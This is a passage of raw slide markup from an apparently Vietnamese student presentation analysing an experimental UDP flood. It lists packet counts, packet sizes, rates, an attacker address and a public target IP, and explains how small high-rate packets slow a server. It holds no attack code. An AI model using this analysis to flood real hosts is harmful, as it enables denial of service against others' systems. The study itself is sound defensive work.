              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>phút</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 50 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>giây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Số</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gói</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tin</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: 537,127 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gói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Kích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thước</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> trung </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bình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của</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gói</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tin</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: 42 byte.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Tốc</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độ</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truyền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tải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Trung </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bình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số</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gói</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mỗi</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giây</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: 4,847.9 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gói</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giây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Băng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thông</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> trung </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bình</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: 1,647 kbps (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>khoảng</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 1.6 Mbps).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Địa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chỉ</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tấn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công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00050" lvl="1"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192.168.1.67</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Địa</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chỉ</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ip</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bị</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tấn</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công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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18.141.129.246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4686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19DD-B0BB-4612-BB0F-A9CCE2F23223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8596668" cy="701749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Đánh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B8E07F-3765-49C7-AE73-20DDD14F6D40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1311349"/>
            <a:ext cx="9033736" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Phân tích sâu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Gói tin UDP flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>: Các gói tin có kích thước trung bình khá nhỏ (42 byte), điều này phù hợp với các cuộc tấn công UDP flood, thường gửi các gói tin có kích thước nhỏ nhưng với tần suất rất cao để làm cạn kiệt băng thông hoặc tài nguyên xử lý của máy chủ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Tốc độ tấn công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Với tốc độ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>4,847.9 gói/giây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t> và tổng số </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>537,127 gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, cuộc tấn công này có tốc độ khá cao, đủ để gây áp lực lên hệ thống đích nếu hệ thống đó không có các biện pháp bảo vệ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Băng thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t> khoảng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>1.6 Mbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t> là một lưu lượng tương đối thấp so với các cuộc tấn công DDoS lớn, nhưng trong môi trường thử nghiệm hoặc với tài nguyên hạn chế, lưu lượng này có thể vẫn đủ để làm hệ thống phản hồi chậm hoặc ngừng hoạt động.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1627323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EB18-B1DA-41EB-AEEF-18E6C3919F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8596668" cy="581247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A2B068-33D6-43B3-8CB9-AAA9C668E6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1325527"/>
            <a:ext cx="8596668" cy="4715836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Khiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hồi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chậm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mỗi</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hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Với</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phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hồi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chậm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nếu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lượng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiếp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tăng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tổ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>năng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</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trong</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chấm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dứt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghìn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
